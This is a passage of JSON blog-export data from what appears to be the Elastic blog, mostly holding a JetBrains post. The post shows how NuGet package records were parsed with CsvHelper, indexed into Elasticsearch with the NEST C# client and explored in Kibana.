services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt62646ad19dd7b0b8","ACL":{},"created_at":"2020-06-17T03:23:52.847Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"government","label_l10n":"Government","tags":[],"title":"Government","updated_at":"2020-07-06T22:17:42.931Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.550Z","user":"blt4b2e1169881270a8"}}],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"title":"Graph analysis","label_l10n":"Graph analysis","keyword":"graph-analysis","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt2989879b6a646ab8","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:39:15.641Z","updated_at":"2020-06-17T03:40:03.306Z","ACL":{},"_version":2,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-09-24T03:14:50.225Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt38b685f1ed69d73e","created_by":"bltf6ab93733e4e3a73","updated_by":"bltf6ab93733e4e3a73","created_at":"2020-09-22T20:50:09.669Z","updated_at":"2020-09-22T20:50:09.669Z","content_type":"image/png","file_size":"39337","filename":"blog-thumb-siren.png","title":"blog-thumb-siren.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-10-06T17:59:20.157Z","user":"bltda02bad9f9f792f1"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt38b685f1ed69d73e/5f6a6381f0d2b04fae76ca4d/blog-thumb-siren.png"},"title":"Investigative analysis of disjointed data in Elasticsearch with the Siren Platform","title_l10n":"Investigative analysis of disjointed data in Elasticsearch with the Siren Platform","updated_at":"2024-05-01T16:41:39.176Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/investigative-analysis-of-disjointed-data-in-elasticsearch-with-the-siren-platform","use_case":["security analytics"],"versions":[],"weekly_category":[],"publish_details":{"time":"2024-05-01T16:41:42.688Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_version":13,"locale":"en-us","uid":"blt966d6f8eba7c2930","ACL":{},"abstract_l10n":"Find out how JetBrains used .NET, Elasticsearch, and Kibana to analyze and visualize their community's past as well as make predictions about the future.","author":["blt410a675963994720"],"body_l10n":"\u003cp\u003eRecently, the JetBrains .NET advocacy team published \u003ca href=\"https://blog.jetbrains.com/dotnet/2020/11/09/diving-into-nuget-history-for-fun-and-community-insights/\"\u003ea deep-dive post powered by data we retrieved from the official NuGet APIs\u003c/a\u003e with the goal of better understanding our community's OSS past and trying to predict trends into the future. This resulted in a giant dataset. Given our experience with Elasticsearch, we knew that the best tool to process millions of records was what we're calling the \u003cstrong\u003eNECK\u003c/strong\u003e stack: .NET, Elasticsearch, CSV, and Kibana.\u003c/p\u003e\u003cp\u003eIn this blog, we'll explore what it took to retrieve the millions of package records, process them using .NET and \u003ca href=\"https://jetbrains.com/rider\"\u003eJetBrains Rider\u003c/a\u003e, index them into \u003ca href=\"https://www.elastic.co/elasticsearch\"\u003eElasticsearch\u003c/a\u003e via the \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/client/net-api/current/index.html\" target=\"_self\"\u003eNEST client\u003c/a\u003e, and ultimately build the \u003ca href=\"https://www.elastic.co/kibana\"\u003eKibana\u003c/a\u003e dashboards we used to generate our reports.\u003c/p\u003e\u003ch2\u003e\u003cstrong\u003eThe NuGet API and Data\u003c/strong\u003e\u003c/h2\u003e\u003cp\u003eMost technology stacks have adopted open source and dependency management as core tenets, and Microsoft and .NET have done that enthusiastically so. For those unfamiliar with the .NET ecosystem, NuGet is the official package management protocol and service for .NET developers.\u003c/p\u003e\u003cp\u003eThe NuGet ecosystem has grown substantially since its initial release in 2011, starting with a handful of packages to today's service hosting over 231,181 unique packages and close to 3 million permutations; that's a lot of data.\u003c/p\u003e\u003cp\u003eLuckily, \u003ca href=\"https://twitter.com/maartenballiauw\"\u003eMaarten Balliauw\u003c/a\u003e has done much of the heavy lifting to \u003ca href=\"https://blog.maartenballiauw.be/post/2019/07/30/indexing-searching-nuget-with-azure-functions-and-search.html\"\u003eunderstand and retrieve the data from the NuGet API\u003c/a\u003e. In summary, we were able to loop through the NuGet API and retrieve the following pieces of information: Authors, icon URL, package Id, listing status, project URL, publish date, tags, target frameworks, package URL, package version, download numbers, and other unimportant data.\u003c/p\u003e\u003cp\u003eOnce the process was complete, we had generated a \u003cstrong\u003e1.5 GB\u003c/strong\u003e CSV file during our retrieval of data, likely the most massive CSV file we've ever seen. We attempted to open this file in some commonly-used spreadsheet tools like Excel, Google Spreadsheets, and Apple Numbers with no success, and frankly didn't have much hope of it working. Here's a small sample of that data.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePartitionKey,RowKey,Timestamp,Authors:String,IconUrl:String,Id:String,IsListed:Boolean,LicenseUrl:String,ProjectUrl:String,Published:DateTime,Tags:String,TargetFrameworks:String,Url:String,Version:String,VersionNormalized:String,VersionVerbatim:String,DownloadCount:Long,DownloadCountForAllVersions:Long,PackageType:String,IsVerified:Boolean \u003cbr /\u003e03.ADSFramework.Logging,1.0.0,2020-10-30T06:49:21.0291480Z,\"ADSBI, Inc.\",https://github.com/nathanadsbi/ADSIcon/blob/master/ads.ico?raw=true,03.ADSFramework.Logging,False,,\"\",1900-01-01T00:00:00.0000000Z,03.ADSBI 03.ADSFramework.Logging,\"[\"\"net461\"\"]\",https://globalcdn.nuget.org/packages/03.adsframework.logging.1.0.0.nupkg,1.0.0,1.0.0,1.0.0,,,, \u003cbr /\u003e03.ADSFramework.Logging,1.0.2,2020-10-30T06:49:22.4903642Z,\"ADSBI, Inc.\",https://github.com/nathanadsbi/ADSIcon/blob/master/ads.ico?raw=true,03.ADSFramework.Logging,False,,\"\",1900-01-01T00:00:00.0000000Z,03.ADSBI 03.ADSFramework.Logging,\"[\"\"net461\"\"]\",https://globalcdn.nuget.org/packages/03.adsframework.logging.1.0.2.nupkg,1.0.2,1.0.2,1.0.2,,,, \u003cbr /\u003e03.ADSFramework,1.0.0,2020-10-30T05:29:51.6321787Z,\"Nathan Sawyer, Patrick Della Rocca, Shannon Fisher\",\"\",03.ADSFramework,False,,\"\",1900-01-01T00:00:00.0000000Z,\"\",\"[\"\"net461\"\",\"\"netstandard2.0\"\"]\",https://globalcdn.nuget.org/packages/03.adsframework.1.0.0.nupkg,1.0.0,1.0.0,1.0.0,,,,\u003c/pre\u003e\u003cp\u003eWe chose to represent the data in a comma-delimited format to allow for easy consumption of the information, which we'll see in the next section.\u003c/p\u003e\u003ch2\u003e\u003cstrong\u003e.NET Console Processing\u003c/strong\u003e\u003c/h2\u003e\u003cp\u003eSince adopting a cross-platform mantra, .NET has been a lot more interesting from a tooling and data-processing perspective. Developers can now write and execute the same code across all major operating systems: Windows, Linux, and macOS. As JetBrains .NET advocates, we love C#, and we also love the \u003ca href=\"https://www.nuget.org/packages/NEST/\"\u003eElasticsearch client library, NEST\u003c/a\u003e, developed and maintained by Elastic. We were also able to tap into the OSS ecosystem and utilize the fantastic \u003ca href=\"https://www.nuget.org/packages/CsvHelper/\"\u003eCsvHelper library\u003c/a\u003e, which makes processing CSV files effortless. Let's take a look at how we harnessed the OSS .NET ecosystem's power to consume and load 1.5 GB of data into Elasticsearch.\u003c/p\u003e\u003ch3\u003e\u003cstrong\u003eProcessing CSVs using CSVHelper\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003eCSV files aren't incredibly difficult to process, primarily when CsvHelper contributors have handled much of the hard work of determining and solving edge cases. To get started, we first need to install the NuGet package into our Console application, along with Newtonsoft.Json, a library designed to work with JSON.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5f2d22abde1f4d01/5fc7c092fd99385ff600a907/blog-jetbrains-1.png\" data-sys-asset-uid=\"blt5f2d22abde1f4d01\" style=\"display: block;margin: auto;width: 600px;\" width=\"600\"/\u003e\u003c/p\u003e\u003cp\u003eOnce we install the package, we'll need to create a ClassMap definition. A ClassMap allows us to define which corresponding CSV columns we assign to our C# class properties. Like most data projects, our data is rarely perfect, and we need to account for strange edge cases and broken rows. We can also take this opportunity to normalize data \u003cstrong\u003ebefore\u003c/strong\u003e it goes into our Elasticsearch index.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003epublic class NugetRecordMap : ClassMap\u0026lt;Package\u0026gt;\u003cbr /\u003e{\u003cbr /\u003e public NugetRecordMap()\u003cbr /\u003e {\u003cbr /\u003e string [] ToStringArray(string value)\u003cbr /\u003e {\u003cbr /\u003e if (string.IsNullOrWhiteSpace(value))\u003cbr /\u003e return new string [0];\u003cbr /\u003e\u003cbr /\u003e try\u003cbr /\u003e {\u003cbr /\u003e // just because we have brackets doesn't mean\u003cbr /\u003e // we have a JSON Array... trust me\u003cbr /\u003e if (\u003cbr /\u003e value.StartsWith(\"[\") \u0026amp;\u0026amp;\u003cbr /\u003e value.EndsWith(\"]\") \u0026amp;\u0026amp;\u003cbr /\u003e value.Count(x =\u0026gt; x == '[') == 1 \u0026amp;\u0026amp;\u003cbr /\u003e value.Count(x =\u0026gt; x == ']') == 1)\u003cbr /\u003e {\u003cbr /\u003e return DeserializeObject\u0026lt;string []\u0026gt;(value);\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e catch\u003cbr /\u003e {\u003cbr /\u003e }\u003cbr /\u003e\u003cbr /\u003e try\u003cbr /\u003e {\u003cbr /\u003e return value\u003cbr /\u003e .Replace(\"[\", string.Empty)\u003cbr /\u003e .Replace(\"]\", string.Empty)\u003cbr /\u003e .Split(' ', StringSplitOptions.TrimEntries | StringSplitOptions.RemoveEmptyEntries);\u003cbr /\u003e }\u003cbr /\u003e catch\u003cbr /\u003e {\u003cbr /\u003e }\u003cbr /\u003e\u003cbr /\u003e return new string[0];\u003cbr /\u003e }\u003cbr /\u003e\u003cbr /\u003e var exclude = new [] { \"LLC\", \"Inc.\" };\u003cbr /\u003e\u003cbr /\u003e // used for Elasticsearch\u003cbr /\u003e Map(m =\u0026gt; m.Id).Ignore();\u003cbr /\u003e Map(m =\u0026gt; m.License).Ignore();\u003cbr /\u003e Map(m =\u0026gt; m.PartitionKey).Name(\"PartitionKey\");\u003cbr /\u003e Map(m =\u0026gt; m.RowKey).Name(\"RowKey\");\u003cbr /\u003e Map(m =\u0026gt; m.Authors).ConvertUsing(r =\u0026gt;\u003cbr /\u003e {\u003cbr /\u003e return r\u003cbr /\u003e .GetField(\"Authors:String\")?\u003cbr /\u003e .ToLowerInvariant()\u003cbr /\u003e .Replace(\"and other contributors\", string.Empty)\u003cbr /\u003e .Replace(\"and contributors\", string.Empty)\u003cbr /\u003e .Split(',', StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)\u003cbr /\u003e .Except(exclude, StringComparer.OrdinalIgnoreCase)\u003cbr /\u003e .ToArray();\u003cbr /\u003e }\u003cbr /\u003e );\u003cbr /\u003e Map(m =\u0026gt; m.IconUrl).Name(\"IconUrl:String\");\u003cbr /\u003e Map(m =\u0026gt; m.PackageId).Name(\"Id:String\");\u003cbr /\u003e Map(m =\u0026gt; m.IsListed).Name(\"IsListed:Boolean\");\u003cbr /\u003e Map(m =\u0026gt; m.LicenseUrl).Name(\"LicenseUrl:String\");\u003cbr /\u003e Map(m =\u0026gt; m.ProjectUrl).Name(\"ProjectUrl:String\");\u003cbr /\u003e Map(m =\u0026gt; m.Published).Name(\"Published:DateTime\");\u003cbr /\u003e Map(m =\u0026gt; m.Tags).ConvertUsing(r =\u0026gt; ToStringArray(r.GetField(\"Tags:String\")).Select(x =\u0026gt; x.ToLowerInvariant()).ToArray());\u003cbr /\u003e Map(m =\u0026gt; m.TargetFrameworks).ConvertUsing(r =\u0026gt; ToStringArray(r.GetField(\"TargetFrameworks:String\")));\u003cbr /\u003e Map(m =\u0026gt; m.Url).Name(\"Url:String\");\u003cbr /\u003e Map(m =\u0026gt; m.Version).Name(\"Version:String\");\u003cbr /\u003e Map(m =\u0026gt; m.VersionNormalized).Name(\"VersionNormalized:String\");\u003cbr /\u003e Map(m =\u0026gt; m.VersionVerbatim).Name(\"VersionVerbatim:String\");\u003cbr /\u003e Map(m =\u0026gt; m.Prefix).ConvertUsing(r =\u0026gt; {\u003cbr /\u003e var id = r.GetField(\"Id:String\");\u003cbr /\u003e if (id.Contains('.')) {\u003cbr /\u003e return id.Substring(0, id.IndexOf('.'));\u003cbr /\u003e }\u003cbr /\u003e return id.ToLowerInvariant();\u003cbr /\u003e });\u003cbr /\u003e Map(m =\u0026gt; m.DownloadCount).ConvertUsing(m =\u0026gt; {\u003cbr /\u003e var field = m.GetField(\"DownloadCount:Long\");\u003cbr /\u003e if (long.TryParse(field, out var value))\u003cbr /\u003e return value;\u003cbr /\u003e\u003cbr /\u003e return null;\u003cbr /\u003e });\u003cbr /\u003e Map(m =\u0026gt; m.DownloadCountForAllVersions).ConvertUsing(m =\u0026gt; {\u003cbr /\u003e var field = m.GetField(\"DownloadCountForAllVersions:Long\");\u003cbr /\u003e if (long.TryParse(field, out var value))\u003cbr /\u003e return value;\u003cbr /\u003e\u003cbr /\u003e return null;\u003cbr /\u003e });\u003cbr /\u003e Map(m =\u0026gt; m.PackageType).ConvertUsing(m =\u0026gt; {\u003cbr /\u003e var field = m.GetField(\"PackageType:String\");\u003cbr /\u003e return string.IsNullOrWhiteSpace(field) ? \"Dependency\" : field;\u003cbr /\u003e });\u003cbr /\u003e Map(m =\u0026gt; m.IsVerified).ConvertUsing(m =\u0026gt; {\u003cbr /\u003e var field = m.GetField(\"IsVerified:Boolean\");\u003cbr /\u003e if (bool.TryParse(field, out var value))\u003cbr /\u003e return value;\u003cbr /\u003e\u003cbr /\u003e return false;\u003cbr /\u003e });\u003cbr /\u003e }\u003cbr /\u003e}\u003c/pre\u003e\u003cp\u003eA good general rule when working with Elasticsearch is to clean as much of the data before indexing. Folks may have noticed that in the example rows, some of the columns contained \u003cem\u003earrays\u003c/em\u003e. Handling non-flat data in a flat representation means we need to take approaches to maintain data integrity without compromising on the simple format. In our case, we chose array syntax as we know Elasticsearch can straightforwardly handle array fields.\u003c/p\u003e\u003cp\u003eEagle-eyed C# developers may have also recognized the empty catch blocks. We found a few lines in the 2.7 million rows that we could not process in our application runs. We erred on the side of processing the most records we could, rather than \u003cstrong\u003eall\u003c/strong\u003e of them. In the end, five rows were incorrect due to syntax issues. Folks considering this approach should consider error handling and whether data loss is acceptable for their use case.\u003c/p\u003e\u003ch3\u003e\u003cstrong\u003eDefining Our Index With NEST\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003eLike CSVHelper, we can retrieve the \u003ca href=\"https://www.nuget.org/packages/NEST/\"\u003eNEST package from NuGet\u003c/a\u003e. NuGet package versions for NEST should match the version of our Elasticsearch instance. In this case, we are using Elasticsearch 7.9.0, but there are no specific features that we are utilizing that are exclusive to this particular version.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltafa1726ed3f8d5d0/5fc7c09b24612d7400daa7c1/blog-jetbrains-2.png\" data-sys-asset-uid=\"bltafa1726ed3f8d5d0\" style=\"display: block;margin: auto;width: 600px;\" width=\"600\"/\u003e\u003c/p\u003e\u003cp\u003eNext, we need to define our Elasticsearch index. Kibana will use our index to allow us to run interesting queries and generate meaningful dashboards. Luckily, NEST enables us to define indexes using C# objects and attributes.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eElasticsearchType(IdProperty = \"Id\", RelationName = \"package\")]\u003cbr /\u003epublic record Package\u003cbr /\u003e{\u003cbr /\u003e public string Id =\u0026gt; $\"{PackageId}_{Version}\";\u003cbr /\u003e\u003cbr /\u003e [Text(Index = false, Store = false)] public string PartitionKey { get; set; }\u003cbr /\u003e [Text(Index = false, Store = false)] public string RowKey { get; set; }\u003cbr /\u003e [Date(Store = true)] public DateTime Timestamp { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string [] Authors { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = false)]\u003cbr /\u003e public string IconUrl { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string PackageId { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Boolean(NullValue = false, Store = true)]\u003cbr /\u003e public bool IsListed { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string LicenseUrl { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string ProjectUrl { get; set; }\u003cbr /\u003e \u003cbr /\u003e public DateTime Published { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"lowercase_keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string [] Tags { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"lowercase_keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string [] TargetFrameworks { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string Url { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string Version { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string VersionNormalized { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string VersionVerbatim { get; set; }\u003cbr /\u003e \u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string Prefix { get; set; }\u003cbr /\u003e \u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string License {\u003cbr /\u003e get\u003cbr /\u003e {\u003cbr /\u003e if (string.IsNullOrWhiteSpace(LicenseUrl))\u003cbr /\u003e return \"Unspecified\";\u003cbr /\u003e\u003cbr /\u003e if (LicenseUrl.Contains(\"deprecateLicenseUrl\", StringComparison.OrdinalIgnoreCase))\u003cbr /\u003e return \"Deprecated\";\u003cbr /\u003e \u003cbr /\u003e if (LicenseUrl.Contains(\"mit\", StringComparison.OrdinalIgnoreCase))\u003cbr /\u003e return \"MIT\";\u003cbr /\u003e \u003cbr /\u003e if (LicenseUrl.Contains(\"apache\", StringComparison.OrdinalIgnoreCase))\u003cbr /\u003e return \"Apache\";\u003cbr /\u003e \u003cbr /\u003e if (LicenseUrl.Contains(\"BSD\", StringComparison.OrdinalIgnoreCase))\u003cbr /\u003e return \"BSD\";\u003cbr /\u003e \u003cbr /\u003e if (LicenseUrl.Contains(\"LGPL\", StringComparison.OrdinalIgnoreCase))\u003cbr /\u003e return \"LGPL\";\u003cbr /\u003e\u003cbr /\u003e return \"Custom\";\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e\u003cbr /\u003e [Number(NumberType.Long, Store = true, NullValue = 0)]\u003cbr /\u003e public long? DownloadCount { get; set; }\u003cbr /\u003e \u003cbr /\u003e [Number(NumberType.Long, Store = true, NullValue = 0)]\u003cbr /\u003e public long? DownloadCountForAllVersions { get; set; }\u003cbr /\u003e\u003cbr /\u003e [Text(Analyzer = \"keyword\", Store = true, Fielddata = true)]\u003cbr /\u003e public string PackageType { get; set; }\u003cbr /\u003e \u003cbr /\u003e [Boolean(NullValue = false, Store = true)]\u003cbr /\u003e public bool? IsVerified { get; set; }\u003cbr /\u003e}\u003c/pre\u003e\u003cp\u003eWe define the type of data and the analyzer for indexing because the \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/7.10/analysis-standard-analyzer.html\"\u003estandard analyzer\u003c/a\u003e filters out stop words and tokenizes our values for search. In our case, we aren’t searching, but reporting on our documents. When working with Kibana, it’s essential to set the value of Store to true, as explained by the \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/7.10/mapping-store.html\"\u003eElasticsearch documentation\u003c/a\u003e:\u003c/p\u003e\u003cblockquote\u003eBy default, field values are \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-index.html\"\u003eindexed\u003c/a\u003e to make them searchable, but they are not stored. This means that the field can be queried, but the original field value cannot be retrieved.\u003c/blockquote\u003e\u003cp\u003eKibana is an analytical tool and performs aggregates and results based on exact matches. We also need to treat date and time, booleans, and integers differently. You may even notice the index has array definitions for Authors, Tags, and TargetFrameworks. Unlike traditional relational databases, we can store these values as arrays directly in the document, and Elasticsearch will index them appropriately.\u003c/p\u003e\u003ch2\u003e\u003cstrong\u003eStreaming from CSV to Elasticsearch\u003c/strong\u003e\u003c/h2\u003e\u003cp\u003eNow that we have our CSV map and our Elasticsearch Index defined, let's start processing some records. We need to open our \u003cstrong\u003e1.5 GB\u003c/strong\u003e file and stream the information to Elasticsearch. In .NET, we can use native file APIs alongside CSVHelper to accomplish this in a few lines of C#.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eprivate static CsvReader GetCsvReader(string filename)\u003cbr /\u003e{\u003cbr /\u003e var stream = File.OpenRead(filename);\u003cbr /\u003e var reader = new StreamReader(stream);\u003cbr /\u003e var csv = new CsvReader(reader, CultureInfo.InvariantCulture)\u003cbr /\u003e {\u003cbr /\u003e Configuration =\u003cbr /\u003e {\u003cbr /\u003e HasHeaderRecord = true,\u003cbr /\u003e MissingFieldFound = (headers, indexName, ctx) =\u0026gt;\u003cbr /\u003e {\u003cbr /\u003e // skip the row\u003cbr /\u003e Console.WriteLine($\"Bad row - {ctx.Row} : {ctx.RawRecord}\");\u003cbr /\u003e },\u003cbr /\u003e BadDataFound = (ctx) =\u0026gt;\u003cbr /\u003e {\u003cbr /\u003e // skip the row\u003cbr /\u003e Console.WriteLine($\"Bad row - {ctx.Row} : {ctx.RawRecord}\");\u003cbr /\u003e },\u003cbr /\u003e TrimOptions = TrimOptions.Trim\u003cbr /\u003e }\u003cbr /\u003e };\u003cbr /\u003e csv.Configuration.RegisterClassMap\u0026lt;NugetRecordMap\u0026gt;();\u003cbr /\u003e\u003cbr /\u003e return csv;\u003cbr /\u003e}\u003c/pre\u003e\u003cp\u003eWe can also use the extension points of CSVHelper to handle missing fields and incorrect data rows. In this case, we write the misbehaving data to the console output and make a mental note.\u003c/p\u003e\u003cp\u003eWe need to create an instance of ElasticClient, which we will use to make HTTP calls to the web API exposed by our Elasticsearch instance. This defaults to use the URI of localhost:9200, where we’ll be writing our index and documents.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003estatic async Task Main(string [] args)\u003cbr /\u003e{\u003cbr /\u003e var client = new ElasticClient();\u003cbr /\u003e await LoadPackages(client);\u003cbr /\u003e Console.WriteLine(\"Hello World!\");\u003cbr /\u003e}\u003c/pre\u003e\u003cp\u003eNext, we'll need to start processing the data into an Elasticsearch instance. The BulkAll method in NEST makes easy work of even the most intense workloads.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003epublic static async Task LoadPackages(ElasticClient client)\u003cbr /\u003e{\u003cbr /\u003e var indexName = \"nuget-packages\";\u003cbr /\u003e // attempt to delete old index first.\u003cbr /\u003e var delete = await client.Indices.DeleteAsync(indexName);\u003cbr /\u003e\u003cbr /\u003e // create ES index\u003cbr /\u003e var createIndexResponse = await client.Indices.CreateAsync(indexName, c =\u0026gt; c\u003cbr /\u003e .Map\u0026lt;Package\u0026gt;(m =\u0026gt; m.AutoMap())\u003cbr /\u003e .Settings(s =\u0026gt; s\u003cbr /\u003e .Analysis(a =\u0026gt; a\u003cbr /\u003e .Analyzers(aa =\u0026gt; aa\u003cbr /\u003e .Custom(\"lowercase_keyword\", lk =\u0026gt; lk\u003cbr /\u003e .Filters(\"trim\", \"lowercase\", \"unique\")\u003cbr /\u003e .Tokenizer(\"keyword\")\u003cbr /\u003e )\u003cbr /\u003e )\u003cbr /\u003e )\u003cbr /\u003e )\u003cbr /\u003e );\u003cbr /\u003e\u003cbr /\u003e var csv = GetCsvReader(\"data.csv\");\u003cbr /\u003e var bulkPackage = client.BulkAll(\u003cbr /\u003e csv.GetRecords\u0026lt;Package\u0026gt;(),\u003cbr /\u003e b =\u0026gt; b\u003cbr /\u003e .Index(indexName)\u003cbr /\u003e .BackOffTime(\"30s\")\u003cbr /\u003e .BackOffRetries(2)\u003cbr /\u003e .RefreshOnCompleted()\u003cbr /\u003e .MaxDegreeOfParallelism(Environment.ProcessorCount)\u003cbr /\u003e .Size(1000)\u003cbr /\u003e )\u003cbr /\u003e .Wait(TimeSpan.FromDays(1), next =\u0026gt;\u003cbr /\u003e {\u003cbr /\u003e // do something e.g. write number of pages to console\u003cbr /\u003e Console.WriteLine($\"Current on {next.Page}...\");\u003cbr /\u003e });\u003cbr /\u003e}\u003c/pre\u003e\u003cp\u003eIn five code lines, we can delete an existing instance of our index, create a new index, retrieve a handle to the CSV file, and then begin streaming our data to Elasticsearch in 1000 record increments. Now we can combine these two methods to start processing our data.\u003c/p\u003e\u003cp\u003eIt's important to note that csv.GetRecords\u0026lt;Package\u0026gt; will start to stream from disk as efficiently as possible. This approach can still be very memory intensive. We can see memory utilization and traffic highlighted in code by \u003cstrong\u003eDynamic Program Analysis (DPA)\u003c/strong\u003e here. This feature is available in JetBrains ReSharper and Rider and can help catch potential excessive memory usage and memory allocation issues during development.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3df66f164f564853/5fc7c0c742256d5ffdf484bc/blog-jetbrains-3.png\" data-sys-asset-uid=\"blt3df66f164f564853\" style=\"display: block;margin: auto;width: 600px;\" width=\"600\"/\u003e\u003c/p\u003e\u003cp\u003eThe most memory we utilize reaches a whopping 9 GB. Saying this code has room for optimizations is an understatement. Every record that makes up our CSV is a string, and we’re cleaning up the data as we go. The approach causes some memory traffic (allocations and garbage collections), which we expect, given we have a fair amount of data.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt39efd8d7eddb926c/5fc7c0d26f82405d9a4b1524/blog-jetbrains-4.png\" data-sys-asset-uid=\"blt39efd8d7eddb926c\" style=\"display: block;margin: auto;width: 600px;\" width=\"600\"/\u003e\u003c/p\u003e\u003cp\u003eWhile memory usage might be high for some folks, we can see the benefits in the speed that Elasticsearch can process and index our data. On my local MacBook Pro 16\", we can index all 3.3 million records in just under 5 minutes into an Elasticsearch instance running in Docker. Just long enough to get some coffee and pet the dogs.\u003c/p\u003e\u003cp\u003eWe only run this process once, so memory usage and optimization aren't critical for our use case. As always, folks looking to use this approach should consider their situation and adjust accordingly.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt07a95994f7a6d6e6/5fc7c0e8fd99385ff600a911/blog-jetbrains-5.png\" data-sys-asset-uid=\"blt07a95994f7a6d6e6\" style=\"display: block;margin: auto;width: 400px;\" width=\"400\"/\u003e\u003c/p\u003e\u003cp\u003eNow, we're ready to create some dashboards!\u003c/p\u003e\u003ch2\u003e\u003cstrong\u003eKibana, Visualizations, and Dashboards\u003c/strong\u003e\u003c/h2\u003e\u003cp\u003eOne of the biggest reasons we chose Kibana is its ability to run locally. Since this was a research project, we didn't need to share our dashboards or indexes with others, even though we could. Additionally, running Elasticsearch and Kibana inside Docker containers means we could create and upgrade instances without much fuss. We can also launch the Kibana dashboard right from the Docker desktop dashboard.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9083745956a96924/5fc7c0fdfd99385ff600a915/blog-jetbrains-6.png\" data-sys-asset-uid=\"blt9083745956a96924\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eOnce we load the Kibana dashboard in the browser, we need to create a new index pattern. We do that by clicking the \u003cstrong\u003eConnect to your Elasticsearch Index\u003c/strong\u003ein the hero card's bottom-right.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5a7e64528103f0c2/5fc7c140fd99385ff600a919/blog-jetbrains-7.png\" data-sys-asset-uid=\"blt5a7e64528103f0c2\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eFrom here, we need to click the \u003cstrong\u003eCreate index pattern\u003c/strong\u003e button in the top-right. Once into the index pattern page, we can type our index name 